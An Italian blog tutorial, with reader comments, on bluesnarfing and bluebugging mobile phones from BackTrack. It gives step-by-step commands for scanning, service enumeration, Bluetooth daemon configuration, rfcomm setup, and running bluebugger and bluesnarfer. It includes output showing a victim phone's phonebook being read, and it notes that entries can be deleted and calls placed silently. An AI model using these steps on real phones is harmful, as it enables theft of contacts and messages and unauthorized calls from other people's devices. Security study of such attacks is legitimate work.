Bluetooth Sniff with Bluebugger & Bluesnarfer

super-bluetooth-hack.gif

Ciao a tutti,

eccoci arrivati a descrivere un nuovo campo di lavoro per noi del «back|track~blog , stò parlando come da titolo del Bluetooth sniffer.

I tool che useremo sono il Bluebugger ed il Bluesnarfer.

Il Bluebugger è un prodotto della Codito.de , ossia il sito di Martin J. Muench developper di BackTrack.

Prima di comunciare è doveroso dirvi che ovviamente per provare/testare questo tutorial avete bisogno di un Bluetooth device regolarmente riconosciuto da BackTrack , per essere sicuri potete vedere su Google cosa è riconosciuto o meno dai sistemi basati su GNU/Linux in generale , oppure lasciate qualche commento e vediamo cosa riusciamo a fare , oppure ancora entrate in canale e chiedete.

Ma iniziamo il nostro lavoro…..

Appena entriamo in BT , inseriamo la nostra chiavetta usb-bluetooth , e vediamo subito se il dispositivo è riconosciuto dal sistema dando da konsole il comando:

hciconfig

vedremo subito se il dispositio è riconosciuto , dopodiché per attivarlo basta dare il comando:

hciconfig hci0 up

Questo perché il mio dispositivo è visto da BT come hci0 , (hci-zero) , ma finora non ho sentito di dispositivi bluetooth indicati da BT con sigle diverse.

Per essere sicuri che il vostro dispositivo stia lavorando date da konsole il comando:

hciconfig -a

Dovrebbe restituirvi tutta la configurazione del dispositivo.

Ora , in BT ci sono una serie di strumenti per l’ utilizzo in vario modo di connessioni bluetooth chiamati Bluez , e noi iniziamo con il Hcitool , e lo facciamo tramite un piccolo scanning , dando da konsole il comando:

hcitool scan hci0

Questo il risultato che a me restituisce BT dopo aver messo in connettività bluetooth il mio telefono cellulare:

[root@bt ~]$ hcitool scan hci0
Scanning …
00:15:B9:57:80:C0 HaCkLaB-PH

Se non vi vedete arrivare nessun risultato provate a dare il comando BTscanner , oppure ancora a lanciare il BTscanner da backtrck->RadioNetworkAnalisys->Bluetooth->…

Oppure ancora , suate sicuri dell’ attività del cellulare.

Questo è il risultato dato dal mio cellulare , ma in caso di un attacco , o meglio di uno sniffing sarebbe stata la stessa cosa , il sistema mi avrebbe restituito tutti i MacAddress ,(BD) , che avevano il bluetooth attivato , e vi assicuro che provando in una casa isolata non c’é scampo , ma se vi mettete in un aeroporto in una stazione o in un luogo del genere potete immaginare voi lo sniffing che un “malintenzionato” potrebbe fare.

Ecco infatti appena utilizziamo un altro tool , l’ sdptool , cosa riusciamo a vedere nel dispositivo:

brigante ~HaCkLaB.WiFu # sdptool browse 00:15:B9:57:80:C0
Browsing 00:15:B9:57:80:C0 …
Service Name: QC Voice Gateway
Service RecHandle: 0x10000
Service Class ID List:
“Headset Audio Gateway” (0x1112)
“Generic Audio” (0x1203)
Protocol Descriptor List:
“L2CAP” (0x0100)
“RFCOMM” (0x0003)
Channel: 3
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
“Headset” (0x1108)
Version: 0x0100

Service Name: QC Voice Gateway
Service RecHandle: 0x10001
Service Class ID List:
“Handfree Audio Gateway” (0x111f)
“Generic Audio” (0x1203)
Protocol Descriptor List:
“L2CAP” (0x0100)
“RFCOMM” (0x0003)
Channel: 4
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
“Handsfree” (0x111e)
Version: 0x0101

Service Name: FTP
Service RecHandle: 0x10002
Service Class ID List:
“OBEX File Transfer” (0x1106)
Protocol Descriptor List:
“L2CAP” (0x0100)
“RFCOMM” (0x0003)
Channel: 16
“OBEX” (0x0008)
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
“OBEX File Transfer” (0x1106)
Version: 0x0100

Service Name: OPP
Service RecHandle: 0x10003
Service Class ID List:
“OBEX Object Push” (0x1105)
Protocol Descriptor List:
“L2CAP” (0x0100)
“RFCOMM” (0x0003)
Channel: 17
“OBEX” (0x0008)
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
“OBEX Object Push” (0x1105)
Version: 0x0100

Service Name: Serial Port
Service RecHandle: 0x10004
Service Class ID List:
“Serial Port” (0x1101)
Protocol Descriptor List:
“L2CAP” (0x0100)
“RFCOMM” (0x0003)
Channel: 18
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
“Serial Port” (0x1101)

Service Name: Dial-up Networking
Service RecHandle: 0x10005
Service Class ID List:
“Dialup Networking” (0x1103)
Protocol Descriptor List:
“L2CAP” (0x0100)
“RFCOMM” (0x0003)
Channel: 8
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
“Dialup Networking” (0x1103)
Version: 0x0100

Bene , arrivati a questo punto voi direte , ma alla fine non è che hai ricavato molto , sono solo notizie riguardanti le porta di comunicazione , ma abbiate solo un pò di pazienza….

Tramite la konsole ed un editor di testi , nel mio caso Kate , apritevi il file di configurazione di Hdci , diamo quindi da konsole il comando:

kate /etc/bluetooth/hcid.conf

Al suo interno , andate a sostituire il tutto con le stringhe seguenti:

Sia chiaro che consiglio caldamente a tutti di farsi i propri backup , non rovinatevi la vita se non siete sicuri di ciò che fate.

Attenzione:
***
***</div>
<code>#
# HCI daemon configuration file.
#</code>

# HCId options
options {
# Automatically initialize new devices
autoinit yes;

# Security Manager mode
#   none - Security manager disabled
#   auto - Use local PIN for incoming connections
#   user - Always ask user for a PIN
#
security auto;

# Pairing mode
#   none  - Pairing disabled
#   multi - Allow pairing with already paired devices
#   once  - Pair once and deny successive attempts
pairing multi;

# Default PIN code for incoming connections
passkey "1234";
}

# Default settings for HCI devices
device {
# Local device name
#   %d - device id
#   %h - host name
name "device1";

# Local device class
class 0x000000;

# Default packet type
#pkt_type DH1,DM1,HV1;

# Inquiry and Page scan
iscan enable; pscan enable;

# Default link mode
#   none   - no specific policy
#   accept - always accept incoming connections
#   master - become master on incoming connections,
#            deny role switch on outgoing connections
lm accept,master;

# Default link policy
#   none    - no specific policy
#   rswitch - allow role switch
#   hold    - allow hold mode
#   sniff   - allow sniff mode
#   park    - allow park mode
lp rswitch,hold,sniff,park;
auth enable;
encrypt enable;
}
<p align="center">***

***

Ora è stato inserito come PIN , “1234” le 4 cifre internazionalmente di default sulla maggiorparte dei cellulari , ma tramite le opzioni a disposizione , e sempre in caso di un vero attacco , si sarebbe potuto pensare ad un attacco tramite brute-forcing. e comunque chi usa spesso il bluetooth non credo vogliastare sempre lì a digitare il PIN.

Fatto questo , salvate il tutto sovrascrivendo quindi totalmente il file di configurazione di Hdi , e date di nuovo da konsole per un nuovo UPil comando hciconfig -a

vi verrà restituito nuovamente il messaggio in stile con quello precedentemente ricavato tramite lo stesso comando , solo che noterete qualche piccolo cambiamento dato che , come potete vedere dalle righe stesse , abbiamo abilitato lo sniffing.

Ora facciamo il restart del dispositivo e ssociamovi i permessi ideali con i seguen ti comandi:

bash /etc/rc.d/rc.bluetooth restart

Dopodiché:

mknod -m 666 /dev/rfcomm0 c 216 3

mknod -m 666 /dev/rfcomm1 c 216 6

mknod -m 666 /dev/rfcomm2 c 216 7

Come potete benissimo notare non abbiamo fatto altro che creare prima ed associare poi tre connessioni che rispettivamente andranno ad occupare tre diversi canali , il primo RFCOMM0 nel canale 3 “DUN Dial UP” ; Il secondo RFCOMM1 attivo sulcanale 6 FTP , ed il terzo RFCOMM2 attivo nel canale 7 chiamato “OBEX push”.

Andiamo ora ad aggiungere i canali attivi al tool sdptool , da konsole quindi:

sdptool add –channel=3 DUN

sdptool add –channel=6 FTP

sdptool add –channel=7 OPUSH

Dopo aver configurato il tutto correttamente passiamo ora alla parte dello sniffing…

01_-_hacking.jpg

Per far lavorare i due programmi che ci servono per lo sniffing , non dobbiamo fare altro che lanciarli da Shell , oppure se si vuole ottenere direttamente la shell con il menù , vi basta lanciarli dal KdeMenuStart->BckTrack->Radio&NetworkAnalisys->Bluetooth->…..

brigante ~HaCkLaB.WiFu # bluebugger

bluebugger 0.1 ( MaJoMu | http://www.codito.de )
—————————————–

Usage: bluebugger [OPTIONS] -a <addr> [MODE]

-a <addr> = Bluetooth address of target

Options:
——–
-m <name> = Name to use when connecting (default: ”)
-d <device> = Device to use (default: ‘/dev/rfcomm’)
-c <channel> = Channelto use (default: 17)
-n = No device name lookup
-t <timeout> = Timeout in seconds for name lookup (default: 5)
-o <file> = Write output to <file>

Mode:
—–
info = Read Phone Info (default)
phonebook = Read Phonebook (default)
messages = Read SMS Messages (default)
dial <num> = Dial number
ATCMD = Custom Command (e.g. ‘+GMI’)

Note: Modes can be combined, e.g. ‘info phonebook +GMI’

* You have to set txxhe target address

Associamo al comando una nostra stringa , solo per fare una prova….

brigante ~HaCkLaB.WiFu # bluebugger -a 00:15:B9:57:80:C0 info

bluebugger 0.1 ( MaJoMu | http://www.codito.de )
—————————————–

Target Device: ’00:15:B9:57:80:C0′
Target Name: ‘HaCkLaB-PH’

tcgetattr failed: Input/output error
bt_rfcomm_config() failed
…done

Quì il mio telefono si blocca e mi restituisce l’ autorizzazione allo scambio di dialogo : (

Proviamo invece a vedere con il bluesnarfer cosa succede con un cellulare diverso (un pò più vecchiotto a dire il vero….).

Queste le opzioni del Bluesnarfer:

brigante ~HaCkLaB.WiFu # bluesnarfer
bluesnarfer: you must set bd_addr
bluesnarfer, version 0.1 –
usage: bluesnarfer [options] [ATCMD] -b bt_addr

ATCMD : valid AT+CMD (GSM EXTENSION)

TYPE : valid phonebook type ..
example : “DC” (dialed call list)
“SM” (SIM phonebook)
“RC” (recevied call list)
“XX” much more

-b bdaddr : bluetooth device address
-C chan : bluetooth rfcomm channel

-c ATCMD : custom action
-r N-M : read phonebook entry N to M
-w N-M : delete phonebook entry N to M
-f name : search “name” in phonebook address
-s TYPE : select phonebook memory storage
-l : list aviable phonebook memory storage
-i : device info


[root@bt ~]$ bluesnarfer -r -1-100 -b 00:79:S9:77:99:R0

+1 Angelo 049936XXXX

+2 Anta 049936XXXX

+3 AntonellaP 049936XXXX

+4 Giuseppe 049936XXXX

+5 Zio AXXXX 0XXX5XXX56

E la lista potrebbe continuare fino a nostro piacimento

In questo caso il Bluesnarfing ha funzionato benissimo , se eravamo dei malintenzionati , e se solo avessimo voluto avremmo potuto ricevere e cancellare tutta la lista di numeri che erano in rubrica sul telefono.

Le opzioni poi potete vederle benissimo , c’é dallo sniffing dei messaggi , fino al Dial-UP , ossia la possibilità di chiamare in quiet un qualsiasi numero di telefono utilizzando la linea del cellulare attaccato.

Capirete quindi in condizioni ideali che strumento possiamo avere a disposizione.

Oggi gli strumenti mediatici che usano il bluetooth sono moltissimi , non solo cellulari , ma palmari , stampanti , tutti gli strumenti che posso essere collegati ad un pc , e stando ai test che ho fatto , si riesce a trovare compatibilità e riuscita , almeno una volta su cinque.

Lo sniffing con dispositivi bluetooth è una cosa attraente ma anche molto pericolosa , ricordate che le tracce del segnale del vostro telefono sono monitorate quindi spero che non pensiate minimamente di trarre da questo tutorial notizie che possano servirvi a scopi illegali… ….come sempre , nessuno si prenderà responsabilità a riguardo.

Detto questo , in campo di telefonia come del resto riguarda l’ hardware in genere se si ha il mezzo giusto , ed in questo caso il nostro telefono cellulare , si possono arrivare a fare delle belle prove , ma a volte com’è successo a me, per configurare il dispositivo possono passare delle giornate.

Sto cercando di fare l’ UPload di un vecchio video realizzato con Audithor , e creato sempre dal team di remote-exploit , appena posso lo linko nella pagina dei video , in modo tale da poter rendere bene l’ idea.

Ciao a tutti e alla prossima.

La parte di configurazione del tutorial è stata presa da un thrade di Dr_GreeN sul Forums.Remote-exploit , l’ esperimento è nostro.

6 commenti

  1. Ancora compliments!🙂

    Car Whisperer l’hai mai provato?!?

    E’ un tool molto carino! Ihihi…

    http://trifinite.org/trifinite_stuff_carwhisperer.html

  2. appena fatto il download….

    appena posso gli dò una buona occhiata….

    thanx!😉

  3. ciao cerkavo brigante~ x kiedergli km fare a configurare la boot sector x fare convivere xp e backtrack 3 se ci 6 potresti aggiungermi su msn x favo ??? eliodarkdream-@-hotmail.it thx molte mi serve tntiximo qlkuno su kui basarmi….. XDXD

  4. ciao🙂 ho letto questa guida molto interessante bravo senti pero c-e un problema so che non si possono fare domande pero sul chan di IRC Azzurra non rispondete mai.

    bluebugger 0.1 ( MaJoMu | http://www.codito.de )
    —————————————–

    Target Device: ‘XX:XX:XX:XX:XX:XX’
    Target Name: ‘Crash’

    Cannot open ‘/dev/rfcomm0’: Connection refused
    bt ~ # /dev.rfcomm0
    -bash: /dev.rfcomm0: No such file or directory
    bt ~ # /dev/rfcomm0
    -bash: /dev/rfcomm0: No such file or directory
    bt ~ # cd /dev/rfcomm0
    -bash: cd: /dev/rfcomm0: No such file or directory
    bt ~ # bluesnarfer -r -1-100 -b 00:1D:6E:A8:24:29
    bluesnarfer: hci_read_remote_name failed
    bluesnarfer: unable to get device name
    bluesnarfer: open /dev/rfcomm0, Connection refused
    bluesnarfer: bt_rfcomm_config failed
    bluesnarfer: unable to create rfcomm connection
    bluesnarfer: release rfcomm ok

    Mi puoi aiutare pls :(??

  5. Connection refused –> non ti fà capire che la connessione è impossibilitata ?

    o il bluetooth non è configurato bene o non riesce a vedere il telefono per altri motivi che non spieghi.

    ciao.

  6. P.S.:

    se spiegi la procedura passo – passo magari scrivi nella mailinglist che hai tutto lo spazio che vuoi , ma fai tutti i passaggi descritti nella guida e riporta gli eventuali errori.


Comments RSS TrackBack Identifier URI

Lascia un commento

Inserisci i tuoi dati qui sotto o clicca su un'icona per effettuare l'accesso:

Logo WordPress.com

Stai commentando usando il tuo account WordPress.com. Chiudi sessione / Modifica )

Foto Twitter

Stai commentando usando il tuo account Twitter. Chiudi sessione / Modifica )

Foto di Facebook

Stai commentando usando il tuo account Facebook. Chiudi sessione / Modifica )

Google+ photo

Stai commentando usando il tuo account Google+. Chiudi sessione / Modifica )

Connessione a %s...